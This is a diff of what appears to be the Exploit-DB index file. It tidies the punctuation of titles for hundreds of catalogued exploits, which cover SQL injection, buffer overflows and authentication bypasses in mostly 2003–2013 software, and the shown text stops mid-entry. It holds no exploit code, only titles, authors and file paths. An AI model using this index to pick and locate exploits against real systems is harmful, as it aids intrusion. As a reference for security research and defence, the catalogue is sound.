23162,platforms/linux/remote/23162.c,"LSH 1.x - Remote Buffer Overflow Vulnerability (2)",2003-09-19,"m00 security",linux,remote,0 23163,platforms/php/webapps/23163.txt,"Flying Dog Software Powerslave 4.3 Portalmanager sql_id Information Disclosure Vulnerability",2003-09-19,"H Zero Seven",php,webapps,0 -23164,platforms/php/webapps/23164.txt,"myPHPNuke 1.8.8 auth.inc.php SQL Injection Vulnerability",2003-09-20,"Lifo Fifo",php,webapps,0 +23164,platforms/php/webapps/23164.txt,"myPHPNuke 1.8.8 - auth.inc.php SQL Injection Vulnerability",2003-09-20,"Lifo Fifo",php,webapps,0 23165,platforms/windows/dos/23165.txt,"Sun Java 1.x XML Document Nested Entity Denial of Service Vulnerability",2003-09-22,"Sun Microsystems",windows,dos,0 23166,platforms/windows/dos/23166.pl,"Plug And Play Web Server 1.0 002c FTP Service Command Handler Buffer Overflow Vulnerabilities",2003-09-21,"Bahaa Naamneh",windows,dos,0 23167,platforms/irix/dos/23167.c,"Sendmail 8.9.2 Headers Prescan Denial of Service Vulnerability",1998-12-12,marchew,irix,dos,0 @@ -20594,8 +20594,8 @@ id,file,description,date,author,platform,type,port 23401,platforms/windows/remote/23401.txt,"Microsoft Outlook Express 6.0 MHTML Forced File Execution Vulnerability (2)",2003-11-25,"Liu Die Yu",windows,remote,0 23402,platforms/jsp/webapps/23402.txt,"Macromedia JRun 4.0 build 61650 Administrative Interface Multiple Cross-Site Scripting Vulnerabilities",2003-11-26,dr_insane,jsp,webapps,0 23403,platforms/php/webapps/23403.pl,"My_EGallery Module 3.1.1 - Remote Include Command Injection Vulnerability",2003-11-26,"Bojan Zdrnja",php,webapps,0 -23404,platforms/multiple/remote/23404.c,"Applied Watch Command Center 1.0 Authentication Bypass Vulnerability (1)",2003-11-28,"Bugtraq Security",multiple,remote,0 -23405,platforms/multiple/remote/23405.c,"Applied Watch Command Center 1.0 Authentication Bypass Vulnerability (2)",2003-11-28,"Bugtraq Security",multiple,remote,0 +23404,platforms/multiple/remote/23404.c,"Applied Watch Command Center 1.0 - Authentication Bypass Vulnerability (1)",2003-11-28,"Bugtraq Security",multiple,remote,0 +23405,platforms/multiple/remote/23405.c,"Applied Watch Command Center 1.0 - Authentication Bypass Vulnerability (2)",2003-11-28,"Bugtraq Security",multiple,remote,0 23406,platforms/php/webapps/23406.txt,"CuteNews 1.3 Debug Query Information Disclosure Weakness",2003-12-01,scrap,php,webapps,0 23407,platforms/asp/webapps/23407.txt,"Virtual Programming VP-ASP 4.00/5.00 shopsearch.asp SQL Injection Vulnerability",2003-12-01,"Nick Gudov",asp,webapps,0 23408,platforms/asp/webapps/23408.txt,"Virtual Programming VP-ASP 4.00/5.00 shopdisplayproducts.asp SQL Injection Vulnerability",2003-12-01,"Nick Gudov",asp,webapps,0 @@ -20609,7 +20609,7 @@ id,file,description,date,author,platform,type,port 23416,platforms/php/webapps/23416.txt,"Xoops 1.3.x/2.0.x - Multiple Vulnerabilities",2003-12-06,frog,php,webapps,0 23417,platforms/windows/remote/23417.c,"EZMeeting 3.x EZNet.EXE Long HTTP Request Remote Buffer Overflow Vulnerability",2003-12-08,kralor,windows,remote,0 23418,platforms/cgi/webapps/23418.pl,"Webgate WebEye Information Disclosure Vulnerability",2003-12-08,datapath,cgi,webapps,0 -23419,platforms/windows/remote/23419.txt,"Abyss Web Server 1.0/1.1 Authentication Bypass Vulnerability",2003-12-08,"Luigi Auriemma",windows,remote,0 +23419,platforms/windows/remote/23419.txt,"Abyss Web Server 1.0/1.1 - Authentication Bypass Vulnerability",2003-12-08,"Luigi Auriemma",windows,remote,0 23420,platforms/php/webapps/23420.txt,"Bitfolge Snif 1.2.6 Index.PHP Path Cross-Site Scripting Vulnerability",2003-12-09,"Justin Hagstrom",php,webapps,0 23421,platforms/cgi/webapps/23421.txt,"calacode @mail webmail system 3.52 - Multiple Vulnerabilities",2003-12-09,"Nick Gudov",cgi,webapps,0 23422,platforms/windows/remote/23422.txt,"Internet Explorer 5/6,Mozilla 1.2.1 URI Display Obfuscation Weakness (1)",2003-12-09,"Guy Crumpley",windows,remote,0 @@ -20687,7 +20687,7 @@ id,file,description,date,author,platform,type,port 23500,platforms/windows/remote/23500.rb,"InduSoft Web Studio ISSymbol.ocx InternationalSeparator() Heap Overflow",2012-12-20,metasploit,windows,remote,0 23501,platforms/windows/dos/23501.c,"Alt-N MDaemon 6.x/WorldClient Form2Raw Raw Message Handler Buffer Overflow Vulnerability (1)",2003-12-29,"Behrang Fouladi",windows,dos,0 23502,platforms/windows/remote/23502.c,"Alt-N MDaemon 6.x/WorldClient Form2Raw Raw Message Handler Buffer Overflow Vulnerability (2)",2003-12-29,"Rosiello Security",windows,remote,0 -23503,platforms/windows/remote/23503.txt,"NETObserve 2.0 Authentication Bypass Vulnerability",2003-12-29,"Peter Winter-Smith",windows,remote,0 +23503,platforms/windows/remote/23503.txt,"NETObserve 2.0 - Authentication Bypass Vulnerability",2003-12-29,"Peter Winter-Smith",windows,remote,0 23504,platforms/windows/dos/23504.txt,"Microsoft Windows XP/2000 showHelp CHM File Execution Weakness",2003-12-30,"Arman Nayyeri",windows,dos,0 23505,platforms/osx/dos/23505.c,"Apple MacOS X 10.x SecurityServer Daemon Local Denial of Service Vulnerability",2003-12-30,"Matt Burnett",osx,dos,0 23506,platforms/windows/dos/23506.txt,"GoodTech Telnet Server 4.0 - Remote Denial of Service Vulnerability",2004-01-02,"Donato Ferrante",windows,dos,0 @@ -20835,7 +20835,7 @@ id,file,description,date,author,platform,type,port 23656,platforms/multiple/dos/23656.txt,"Oracle 9.x Database Parameter/Statement Buffer Overflow Vulnerabilities",2003-02-05,NGSSoftware,multiple,dos,0 23657,platforms/php/webapps/23657.txt,"Mambo Open Source 4.6 Itemid Parameter Cross-Site Scripting Vulnerability",2004-02-05,"David Sopas Ferreira",php,webapps,0 23658,platforms/linux/local/23658.c,"Linux VServer Project 1.2x CHRoot Breakout Vulnerability",2004-02-06,"Markus Mueller",linux,local,0 -23659,platforms/cgi/webapps/23659.txt,"OpenJournal 2.0 Authentication Bypassing Vulnerability",2004-02-06,"Tri Huynh",cgi,webapps,0 +23659,platforms/cgi/webapps/23659.txt,"OpenJournal 2.0 - Authentication Bypassing Vulnerability",2004-02-06,"Tri Huynh",cgi,webapps,0 23660,platforms/windows/dos/23660.c,"BolinTech Dream FTP Server 1.0 User Name Format String Vulnerability (1)",2004-02-07,shaun2k2,windows,dos,0 23661,platforms/windows/remote/23661.c,"BolinTech Dream FTP Server 1.0 User Name Format String Vulnerability (2)",2004-02-07,Skylined,windows,remote,0 23662,platforms/linux/dos/23662.c,"Nadeo Game Engine Remote Denial of Service Vulnerability",2004-02-09,scrap,linux,dos,0 @@ -20913,7 +20913,7 @@ id,file,description,date,author,platform,type,port 23734,platforms/windows/remote/23734.c,"PSOProxy 0.91 - Remote Buffer Overflow Vulnerability (3)",2004-02-20,NoRpiuS,windows,remote,0 23735,platforms/hardware/remote/23735.py,"Ubiquiti AirOS <= 5.5.2 - Remote POST-Auth Root Command Execution",2012-12-29,xistence,hardware,remote,0 23736,platforms/windows/remote/23736.rb,"IBM Lotus iNotes dwa85W ActiveX Buffer Overflow",2012-12-31,metasploit,windows,remote,0 -23737,platforms/windows/remote/23737.rb,"IBM Lotus QuickR qp2 ActiveX Buffer Overflow",2012-12-31,metasploit,windows,remote,0 +23737,platforms/windows/remote/23737.rb,"IBM Lotus QuickR qp2 - ActiveX Buffer Overflow",2012-12-31,metasploit,windows,remote,0 23738,platforms/linux/local/23738.c,"LGames LBreakout2 2.2.2 - Multiple Environment Variable Buffer Overflow Vulnerabilites",2004-02-21,Li0n7,linux,local,0 23739,platforms/windows/local/23739.txt,"Dell TrueMobile 1300 WLAN System 3.10.39.0 Tray Applet - Local Privilege Escalation Vulnerability",2004-02-22,"Ian Vitek",windows,local,0 23740,platforms/linux/local/23740.c,"Samhain Labs 1.x HSFTP Remote Format String Vulnerability",2004-02-23,priest@priestmaster.org,linux,local,0 @@ -20948,9 +20948,9 @@ id,file,description,date,author,platform,type,port 23769,platforms/windows/dos/23769.pl,"argosoft ftp server 1.0/1.2/1.4 - Multiple Vulnerabilities",2004-02-27,"Beyond Security",windows,dos,0 23770,platforms/php/webapps/23770.txt,"IGeneric Free Shopping Cart 1.4 - SQL Injection Vulnerability",2004-03-01,"David Sopas Ferreira",php,webapps,0 23771,platforms/linux/remote/23771.pl,"GNU Anubis 3.6.x/3.9.x - Multiple Format String",2004-03-01,"Ulf Harnhammar",linux,remote,0 -23772,platforms/linux/remote/23772.c,"GNU Anubis 3.6.x/3.9.x auth.c auth_ident() Function Overflow",2004-03-01,CMN,linux,remote,0 +23772,platforms/linux/remote/23772.c,"GNU Anubis 3.6.x/3.9.x - auth.c auth_ident() Function Overflow",2004-03-01,CMN,linux,remote,0 23773,platforms/php/webapps/23773.txt,"IGeneric Free Shopping Cart 1.4 - Cross-Site Scripting Vulnerability",2004-03-01,"David Sopas Ferreira",php,webapps,0 -23774,platforms/php/webapps/23774.txt,"YaBB SE 1.5.x Arbitrary File Deletion",2004-03-01,"Alnitak and BackSpace",php,webapps,0 +23774,platforms/php/webapps/23774.txt,"YaBB SE 1.5.x - Arbitrary File Deletion",2004-03-01,"Alnitak and BackSpace",php,webapps,0 23775,platforms/php/webapps/23775.txt,"YaBB SE 1.5.x - Multiple Parameter SQL Injection",2004-03-01,"Alnitak and BackSpace",php,webapps,0 23776,platforms/windows/remote/23776.txt,"Software602 602Pro LAN Suite Web Mail Cross-Site Scripting Vulnerability",2004-03-01,"Rafel Ivgi The-Insider",windows,remote,0 23777,platforms/linux/remote/23777.txt,"Squid Proxy 2.4/2.5 NULL URL Character Unauthorized Access Vulnerability",2004-03-01,"Mitch Adair",linux,remote,0 @@ -20977,7 +20977,7 @@ id,file,description,date,author,platform,type,port 23799,platforms/multiple/dos/23799.txt,"Epic Games Unreal Tournament Server 436.0 Engine Remote Format String Vulnerability",2004-03-10,"Luigi Auriemma",multiple,dos,0 23800,platforms/osx/remote/23800.txt,"Apple Safari 1.x Cookie Path Traversal Information Disclosure",2004-03-10,"Corsaire Limited",osx,remote,0 23801,platforms/linux/remote/23801.txt,"GNU MyProxy 20030629 - Cross-Site Scripting Vulnerability",2004-03-11,"Donato Ferrante",linux,remote,0 -23802,platforms/linux/remote/23802.txt,"Pegasi Web Server 0.2.2 Arbitrary File Access",2004-03-11,"Donato Ferrante",linux,remote,0 +23802,platforms/linux/remote/23802.txt,"Pegasi Web Server 0.2.2 - Arbitrary File Access",2004-03-11,"Donato Ferrante",linux,remote,0 23803,platforms/linux/remote/23803.txt,"Pegasi Web Server 0.2.2 Error Page XSS",2004-03-11,"Donato Ferrante",linux,remote,0 23804,platforms/cgi/remote/23804.txt,"cPanel 5/6/7/8/9 Resetpass Remote Command Execution Vulnerability",2004-03-11,"Arab VieruZ",cgi,remote,0 23805,platforms/multiple/dos/23805.txt,"Targem Games Battle Mages 1.0 - Remote Denial of Service Vulnerability",2004-03-11,"Luigi Auriemma",multiple,dos,0 @@ -21014,7 +21014,7 @@ id,file,description,date,author,platform,type,port 23840,platforms/aix/local/23840.pl,"AIX 4.3.3/5.x Getlvcb Command Line Argument Buffer Overflow Vulnerability (1)",2003-05-30,watercloud,aix,local,0 23841,platforms/aix/local/23841.c,"AIX 4.3.3/5.x Getlvcb Command Line Argument Buffer Overflow Vulnerability (2)",2004-03-17,mattox,aix,local,0 23842,platforms/windows/dos/23842.pl,"WFTPD Server GUI 3.21 - Remote Denial of Service Vulnerability",2004-03-17,"Beyond Security",windows,dos,0 -23843,platforms/php/webapps/23843.txt,"Belchior Foundry VCard 2.8 Authentication Bypass Vulnerability",2004-03-17,"saudi linux",php,webapps,0 +23843,platforms/php/webapps/23843.txt,"Belchior Foundry VCard 2.8 - Authentication Bypass Vulnerability",2004-03-17,"saudi linux",php,webapps,0 23844,platforms/php/webapps/23844.txt,"PHP-Nuke Error Manager Module 2.1 error.php language Variable Path Disclosure",2004-03-18,"Janek Vind",php,webapps,0 23845,platforms/php/webapps/23845.txt,"PHP-Nuke Error Manager Module 2.1 error.php Multiple Variables XSS",2004-03-18,"Janek Vind",php,webapps,0 23846,platforms/windows/dos/23846.txt,"Symantec Client Firewall Products 5 SYMNDIS.SYS Driver Remote Denial of Service Vulnerability",2004-03-18,"eEye Digital Security Team",windows,dos,0 @@ -21376,14 +21376,14 @@ id,file,description,date,author,platform,type,port 24214,platforms/asp/webapps/24214.txt,"Web Wiz Forums 7.x Registration_Rules.ASP Cross-Site Scripting Vulnerability",2004-06-15,"Ferruh Mavituna",asp,webapps,0 24215,platforms/php/webapps/24215.txt,"phpHeaven phpMyChat 0.14.5 usersL.php3 - Multiple Parameter SQL Injection",2004-06-15,HEX,php,webapps,0 24216,platforms/php/webapps/24216.html,"phpHeaven phpMyChat 0.14.5 edituser.php3 do_not_login Variable Authentication Bypass",2004-06-15,HEX,php,webapps,0 -24217,platforms/php/webapps/24217.txt,"phpHeaven phpMyChat 0.14.5 admin.php3 Arbitrary File Access",2004-06-15,HEX,php,webapps,0 +24217,platforms/php/webapps/24217.txt,"phpHeaven phpMyChat 0.14.5 admin.php3 - Arbitrary File Access",2004-06-15,HEX,php,webapps,0 24218,platforms/windows/remote/24218.cpp,"Symantec Enterprise Firewall 7.0/8.0 DNSD DNS Cache Poisoning Vulnerability",2004-06-15,fryxar,windows,remote,0 -24219,platforms/windows/remote/24219.txt,"IBM ACPRunner 1.2.5 ActiveX Control Dangerous Method Vulnerability",2004-06-16,"eEye Digital Security Team",windows,remote,0 -24220,platforms/windows/remote/24220.html,"IBM EGatherer 2.0 ActiveX Control Dangerous Method Vulnerability",2004-06-01,"eEye Digital Security Team",windows,remote,0 +24219,platforms/windows/remote/24219.txt,"IBM ACPRunner 1.2.5 - ActiveX Control Dangerous Method Vulnerability",2004-06-16,"eEye Digital Security Team",windows,remote,0 +24220,platforms/windows/remote/24220.html,"IBM EGatherer 2.0 - ActiveX Control Dangerous Method Vulnerability",2004-06-01,"eEye Digital Security Team",windows,remote,0 24221,platforms/linux/remote/24221.pl,"Asterisk PBX 0.7.x - Multiple Logging Format String Vulnerabilities",2004-06-18,kfinisterre@secnetops.com,linux,remote,0 24222,platforms/linux/dos/24222.c,"ircd-hybrid 7.0.1,ircd-ratbox 1.5.1/2.0 - Socket Dequeuing Denial of Service Vulnerability",2004-06-19,"Erik Sperling Johansen",linux,dos,0 24223,platforms/linux/remote/24223.py,"Rlpr 2.0 msg() Function Multiple Vulnerabilities",2004-06-19,jaguar@felinemenace.org,linux,remote,0 -24224,platforms/multiple/remote/24224.c,"TildeSlash Monit 1-4 Authentication Handling Buffer Overflow Vulnerability",2004-06-04,"Nilanjan De",multiple,remote,0 +24224,platforms/multiple/remote/24224.c,"TildeSlash Monit 1-4 - Authentication Handling Buffer Overflow Vulnerability",2004-06-04,"Nilanjan De",multiple,remote,0 24225,platforms/php/webapps/24225.php,"osTicket STS 1.2 Attachment Remote Command Execution Vulnerability",2004-06-21,"Guy Pearce",php,webapps,0 24226,platforms/hardware/remote/24226.txt,"D-Link AirPlus DI-614+, DI-624, DI-704 DHCP Log HTML Injection Vulnerability",2004-06-21,c3rb3r,hardware,remote,0 24227,platforms/php/webapps/24227.txt,"SqWebMail 4.0.4.20040524 - Email Header HTML Injection Vulnerability",2004-06-21,"Luca Legato",php,webapps,0 @@ -21409,7 +21409,7 @@ id,file,description,date,author,platform,type,port 24247,platforms/multiple/dos/24247.txt,"Easy Chat Server 1.x - Multiple Denial of Service Vulnerabilities",2004-07-02,"Donato Ferrante",multiple,dos,0 24248,platforms/unix/dos/24248.txt,"IBM WebSphere Caching Proxy Server 5.0 2 - Denial of Service Vulnerability",2004-07-02,"Leandro Meiners",unix,dos,0 24249,platforms/windows/remote/24249.html,"Microsoft Internet Explorer 6.0 Shell.Application Object Script Execution Weakness",2004-07-03,http-equiv,windows,remote,0 -24250,platforms/multiple/remote/24250.pl,"MySQL 4.1/5.0 Authentication Bypass Vulnerability",2004-07-05,"Eli Kara",multiple,remote,0 +24250,platforms/multiple/remote/24250.pl,"MySQL 4.1/5.0 - Authentication Bypass Vulnerability",2004-07-05,"Eli Kara",multiple,remote,0 24251,platforms/cgi/webapps/24251.txt,"Symantec Brightmail Anti-spam 6.0 Unauthorized Message Disclosure Vulnerability",2004-07-05,"Thomas Springer",cgi,webapps,0 24252,platforms/cgi/webapps/24252.txt,"fastream netfile ftp/web server 6.5/6.7 - Directory Traversal Vulnerability",2004-07-05,"Andres Tarasco Acuna",cgi,webapps,0 24253,platforms/multiple/remote/24253.txt,"12Planet Chat Server 2.9 - Cross-Site Scripting Vulnerability",2004-07-05,"Donato Ferrante",multiple,remote,0 @@ -21429,7 +21429,7 @@ id,file,description,date,author,platform,type,port 24267,platforms/windows/dos/24267.txt,"Microsoft Internet Explorer 6.0 JavaScript Null Pointer Exception Denial of Service Vulnerability",2004-07-12,"Berend-Jan Wever",windows,dos,0 24268,platforms/multiple/remote/24268.txt,"Code-Crafters Ability Mail Server 1.18 errormsg Parameter XSS",2004-07-12,dr_insane,multiple,remote,0 24269,platforms/php/webapps/24269.txt,"NConf 1.3 (detail.php detail_admin_items.php, id parameter) SQL Injection",2013-01-21,haidao,php,webapps,0 -24270,platforms/php/webapps/24270.txt,"NConf 1.3 Arbitrary File Creation",2013-01-21,haidao,php,webapps,0 +24270,platforms/php/webapps/24270.txt,"NConf 1.3 - Arbitrary File Creation",2013-01-21,haidao,php,webapps,0 24272,platforms/multiple/remote/24272.rb,"Jenkins Script-Console Java Execution",2013-01-21,metasploit,multiple,remote,0 24273,platforms/php/remote/24273.rb,"PHP-Charts 1.0 - PHP Code Execution Vulnerability",2013-01-21,metasploit,php,remote,0 24274,platforms/php/webapps/24274.pl,"phpBB 2.0.x Viewtopic.PHP PHP Script Injection Vulnerability",2004-07-12,"sasan hezarkhani",php,webapps,0 @@ -21459,7 +21459,7 @@ id,file,description,date,author,platform,type,port 24298,platforms/asp/webapps/24298.pl,"Internet Software Sciences Web+Center 4.0.1 Cookie Object SQL Injection Vulnerability",2004-07-21,"Noam Rathaus",asp,webapps,0 24299,platforms/asp/webapps/24299.pl,"NetSupport DNA HelpDesk 1.0 Problist Script SQL Injection Vulnerability",2004-07-21,"Noam Rathaus",asp,webapps,0 24300,platforms/asp/webapps/24300.pl,"Leigh Business Enterprises Web HelpDesk 4.0 - SQL Injection Vulnerability",2004-07-21,"Noam Rathaus",asp,webapps,0 -24301,platforms/php/webapps/24301.html,"Mensajeitor Tag Board 1.x Authentication Bypass Vulnerability",2004-07-21,"Jordi Corrales",php,webapps,0 +24301,platforms/php/webapps/24301.html,"Mensajeitor Tag Board 1.x - Authentication Bypass Vulnerability",2004-07-21,"Jordi Corrales",php,webapps,0 24302,platforms/asp/webapps/24302.pl,"Polar Helpdesk 3.0 Cookie Based Authentication System Bypass Vulnerability",2004-07-21,"Noam Rathaus",asp,webapps,0 24303,platforms/php/webapps/24303.txt,"Layton Technology HelpBox 3.0.1 - Multiple SQL Injection Vulnerabilities",2004-07-21,"Noam Rathaus",php,webapps,0 24304,platforms/windows/remote/24304.txt,"Imatix Xitami 2.5 Server Side Includes Cross-Site Scripting Vulnerability",2004-07-22,"Oliver Karow",windows,remote,0 @@ -21480,7 +21480,7 @@ id,file,description,date,author,platform,type,port 24319,platforms/windows/dos/24319.txt,"Aloaha PDF Crypter (3.5.0.1164) - ActiveX Arbitrary File Overwrite",2013-01-24,shinnai,windows,dos,0 24320,platforms/multiple/webapps/24320.py,"SQLiteManager 1.2.4 - Remote PHP Code Injection Vulnerability",2013-01-24,RealGame,multiple,webapps,0 24321,platforms/multiple/remote/24321.rb,"Movable Type 4.2x, 4.3x Web Upgrade Remote Code Execution",2013-01-07,metasploit,multiple,remote,0 -24322,platforms/multiple/remote/24322.rb,"SonicWALL Gms 6 Arbitrary File Upload",2013-01-24,metasploit,multiple,remote,0 +24322,platforms/multiple/remote/24322.rb,"SonicWALL Gms 6 - Arbitrary File Upload",2013-01-24,metasploit,multiple,remote,0 24323,platforms/multiple/remote/24323.rb,"Novell eDirectory 8 - Buffer Overflow",2013-01-24,metasploit,multiple,remote,0 24324,platforms/php/webapps/24324.txt,"PostNuke 0.72/0.75 Reviews Module Cross-Site Scripting Vulnerability",2004-07-26,DarkBicho,php,webapps,0 24325,platforms/multiple/remote/24325.html,"Opera Web Browser 7.53 Location Replace URI Obfuscation Weakness",2004-07-27,"bitlance winter",multiple,remote,0 @@ -21518,8 +21518,8 @@ id,file,description,date,author,platform,type,port 24357,platforms/php/webapps/24357.txt,"PluggedOut Blog 1.51/1.60 Blog_Exec.PHP Cross-Site Scripting Vulnerability",2004-08-07,"befcake beefy",php,webapps,0 24358,platforms/linux/dos/24358.txt,"Xine-Lib 0.99 - Remote Buffer Overflow Vulnerability",2004-07-08,c0ntex,linux,dos,0 24359,platforms/php/webapps/24359.php,"YaPiG 0.92 - Remote Server-Side Script Execution Vulnerability",2004-07-07,aCiDBiTS,php,webapps,0 -24360,platforms/linux/dos/24360.py,"GNU CFEngine 2.0.x/2.1 AuthenticationDialogue Remote Heap Based Buffer Overrun Vulnerability (1)",2004-08-09,"Juan Pablo Martinez Kuhn",linux,dos,0 -24361,platforms/linux/remote/24361.c,"GNU CFEngine 2.0.x/2.1 AuthenticationDialogue Remote Heap Based Buffer Overrun Vulnerability (2)",2004-08-09,jsk,linux,remote,0 +24360,platforms/linux/dos/24360.py,"GNU CFEngine 2.0.x/2.1 - AuthenticationDialogue Remote Heap Based Buffer Overrun Vulnerability (1)",2004-08-09,"Juan Pablo Martinez Kuhn",linux,dos,0 +24361,platforms/linux/remote/24361.c,"GNU CFEngine 2.0.x/2.1 - AuthenticationDialogue Remote Heap Based Buffer Overrun Vulnerability (2)",2004-08-09,jsk,linux,remote,0 24362,platforms/windows/dos/24362.txt,"Internet Security Systems BlackICE PC Protection 3.6 Firewall.INI Local Buffer Overrun Vulnerability",2004-08-11,"Paul Craig",windows,dos,0 24363,platforms/windows/remote/24363.txt,"clearswift mimesweeper for Web 4.0/5.0 - Directory Traversal Vulnerability",2004-07-11,"Kroma Pierre",windows,remote,0 24364,platforms/php/webapps/24364.txt,"WordPress SolveMedia 1.1.0 - CSRF Vulnerability",2013-01-25,"Junaid Hussain",php,webapps,0 @@ -21533,7 +21533,7 @@ id,file,description,date,author,platform,type,port 24372,platforms/php/webapps/24372.txt,"CuteNews 1.3.1 show_archives.php archive Parameter XSS",2004-07-16,"Debasis Mohanty",php,webapps,0 24373,platforms/php/webapps/24373.txt,"PScript PForum 1.24/1.25 User Profile HTML Injection Vulnerability",2004-07-16,"Christoph Jeschke",php,webapps,0 24374,platforms/windows/local/24374.c,"Ipswitch IMail Server 7/8 Weak Password Encryption Weakness",1999-12-20,Adik,windows,local,0 -24375,platforms/php/webapps/24375.txt,"RaXnet Cacti 0.6.x/0.8.x Auth_Login.PHP SQL Injection Vulnerability",2004-07-16,"Fernando Quintero",php,webapps,0 +24375,platforms/php/webapps/24375.txt,"RaXnet Cacti 0.6.x/0.8.x - Auth_Login.PHP SQL Injection Vulnerability",2004-07-16,"Fernando Quintero",php,webapps,0 24376,platforms/multiple/remote/24376.txt,"Opera Web Browser 7.5 Resource Detection Weakness",2004-07-17,"GreyMagic Software",multiple,remote,0 24377,platforms/php/webapps/24377.txt,"Merak Mail Server 7.4.5 address.html Multiple Parameter XSS",2004-07-17,Criolabs,php,webapps,0 24378,platforms/php/webapps/24378.txt,"Merak Mail Server 7.4.5 settings.html Multiple Parameter XSS",2004-07-17,Criolabs,php,webapps,0 @@ -21697,15 +21697,15 @@ id,file,description,date,author,platform,type,port 24565,platforms/php/webapps/24565.txt,"SiteCubed MailWorks Professional Authentication Bypass Vulnerability",2004-09-02,"Paul Craig",php,webapps,0 24566,platforms/php/webapps/24566.txt,"CuteNews 0.88/1.3.x - 'index.php' Cross-Site Scripting Vulnerability",2004-09-02,Exoduks,php,webapps,0 24567,platforms/multiple/remote/24567.txt,"Oracle Database Server 8.1.7/9.0.x ctxsys.driload Access Validation Vulnerability",2004-09-03,"Alexander Kornbrust",multiple,remote,0 -24568,platforms/windows/remote/24568.html,"Grokster 1.3/2.6,KaZaA Media Desktop 1.3.x/1.6.1/2.0.x ActiveX Control Remote Buffer Overflow",2004-09-03,celebrityhacker,windows,remote,0 +24568,platforms/windows/remote/24568.html,"Grokster 1.3/2.6,KaZaA Media Desktop 1.3.x/1.6.1/2.0.x - ActiveX Control Remote Buffer Overflow",2004-09-03,celebrityhacker,windows,remote,0 24569,platforms/linux/dos/24569.txt,"QNX PPPoEd 2.4/4.25/6.2 - Multiple Local Buffer Overrun Vulnerabilities",2004-09-03,"Julio Cesar Fort",linux,dos,0 24570,platforms/linux/local/24570.txt,"QNX PPPoEd 2.4/4.25/6.2 Path Environment Variable Local Command Execution Vulnerability",2004-09-03,"Julio Cesar Fort",linux,local,0 -24571,platforms/windows/remote/24571.html,"Nullsoft Winamp 2.x/3.x/5.0.x ActiveX Control Remote Buffer Overflow Vulnerability",2004-09-03,celebrityhacker,windows,remote,0 +24571,platforms/windows/remote/24571.html,"Nullsoft Winamp 2.x/3.x/5.0.x - ActiveX Control Remote Buffer Overflow Vulnerability",2004-09-03,celebrityhacker,windows,remote,0 24572,platforms/windows/remote/24572.pl,"Ipswitch WhatsUp Gold 7.0/8.0 Notification Instance Name Remote Buffer Overflow Vulnerability",2004-09-03,anonymous,windows,remote,0 24573,platforms/multiple/webapps/24573.txt,"Keene Digital Media Server 1.0.2 - Cross-Site Scripting Vulnerabilities",2004-09-04,dr_insane,multiple,webapps,0 24574,platforms/cgi/webapps/24574.txt,"Webmin 1.x HTML Email Command Execution Vulnerability",2004-09-07,"Keigo Yamazaki",cgi,webapps,0 24575,platforms/php/webapps/24575.txt,"PSNews 1.1 No Parameter Cross-Site Scripting Vulnerability",2004-09-05,"Michal Blaszczak",php,webapps,0 -24576,platforms/cgi/webapps/24576.txt,"UtilMind Solutions Site News 1.1 Authentication Bypass Vulnerability",2004-09-07,anonymous,cgi,webapps,0 +24576,platforms/cgi/webapps/24576.txt,"UtilMind Solutions Site News 1.1 - Authentication Bypass Vulnerability",2004-09-07,anonymous,cgi,webapps,0 24578,platforms/osx/local/24578.rb,"Setuid Tunnelblick Privilege Escalation",2013-03-05,metasploit,osx,local,0 24579,platforms/osx/local/24579.rb,"Viscosity setuid-set ViscosityHelper Privilege Escalation",2013-03-05,metasploit,osx,local,0 24580,platforms/windows/dos/24580.txt,"Kaspersky Internet Security 2013 - Denial of Service Vulnerability",2013-03-05,"Marc Heuse",windows,dos,0 @@ -21746,7 +21746,7 @@ id,file,description,date,author,platform,type,port 24616,platforms/php/webapps/24616.txt,"TUTOS file_overview.php link_id Parameter SQL Injection",2004-09-20,"Joxean Koret",php,webapps,0 24617,platforms/php/webapps/24617.txt,"TUTOS app_new.php t Parameter XSS",2004-09-20,"Joxean Koret",php,webapps,0 24618,platforms/windows/dos/24618.c,"Impressions Games Lords of the Realm III Nickname Remote Denial of Service Vulnerability",2004-09-20,"Luigi Auriemma",windows,dos,0 -24619,platforms/cgi/webapps/24619.txt,"EmuLive Server4 Authentication Bypass And Denial of Service Vulnerabilities",2004-09-21,"James Bercegay",cgi,webapps,0 +24619,platforms/cgi/webapps/24619.txt,"EmuLive Server4 - Authentication Bypass And Denial of Service Vulnerabilities",2004-09-21,"James Bercegay",cgi,webapps,0 24620,platforms/windows/dos/24620.c,"LeadMind Pop Messenger 1.60 Illegal Character Remote Denial of Service Vulnerability",2004-09-21,"Luigi Auriemma",windows,dos,0 24621,platforms/php/webapps/24621.txt,"Pinnacle ShowCenter 1.51 Web Interface Skin Denial of Service Vulnerability",2004-09-21,"Marc Ruef",php,webapps,0 24622,platforms/linux/remote/24622.c,"LaTeX2rtf 1.9.15 - Remote Buffer Overflow Vulnerability",2004-09-21,"D. J. Bernstein",linux,remote,0 @@ -22114,7 +22114,7 @@ id,file,description,date,author,platform,type,port 25010,platforms/linux/remote/25010.txt,"O3Read 0.0.3 HTML Parser Buffer Overflow Vulnerability",2004-12-17,"Wiktor Kopec",linux,remote,0 25011,platforms/multiple/remote/25011.txt,"HTML2HDML 1.0.3 - File Conversion Buffer Overflow Vulnerability",2004-12-15,"Matthew Dabrowski",multiple,remote,0 25012,platforms/windows/dos/25012.c,"Easy Software Products LPPassWd 1.1.22 Resource Limit Denial of Service Vulnerability",2004-12-11,"Bartlomiej Sieka",windows,dos,0 -25013,platforms/windows/remote/25013.txt,"Interactive Studio GamePort 3.0/3.1/4.0 Arbitrary application execution",2004-12-17,"amoXi & Dr.vaXin",windows,remote,0 +25013,platforms/windows/remote/25013.txt,"Interactive Studio GamePort 3.0/3.1/4.0 - Arbitrary application execution",2004-12-17,"amoXi & Dr.vaXin",windows,remote,0 25014,platforms/php/webapps/25014.txt,"WorkBoard 1.2 - Multiple Cross-Site Scripting Vulnerabilities",2004-12-17,Lostmon,php,webapps,0 25015,platforms/linux/remote/25015.txt,"Michael Kohn Ringtone Tools 2.22 EMelody File Remote Buffer Overflow Vulnerability",2004-12-15,"Qiao Zhang",linux,remote,0 25016,platforms/windows/remote/25016.txt,"ASP2PHP 0.76.23 Preparse Token Variable Buffer Overflow Vulnerability",2004-12-15,"Qiao Zhang",windows,remote,0 @@ -22132,8 +22132,8 @@ id,file,description,date,author,platform,type,port 25028,platforms/multiple/remote/25028.txt,"CSV2XML 0.5.1 - Buffer Overflow Vulnerability",2004-12-15,"Limin Wang",multiple,remote,0 25029,platforms/windows/remote/25029.txt,"abctab2ps 1.6.3 Trim_Title Function ABC File Remote Buffer Overflow Vulnerability",2004-12-15,"Limin 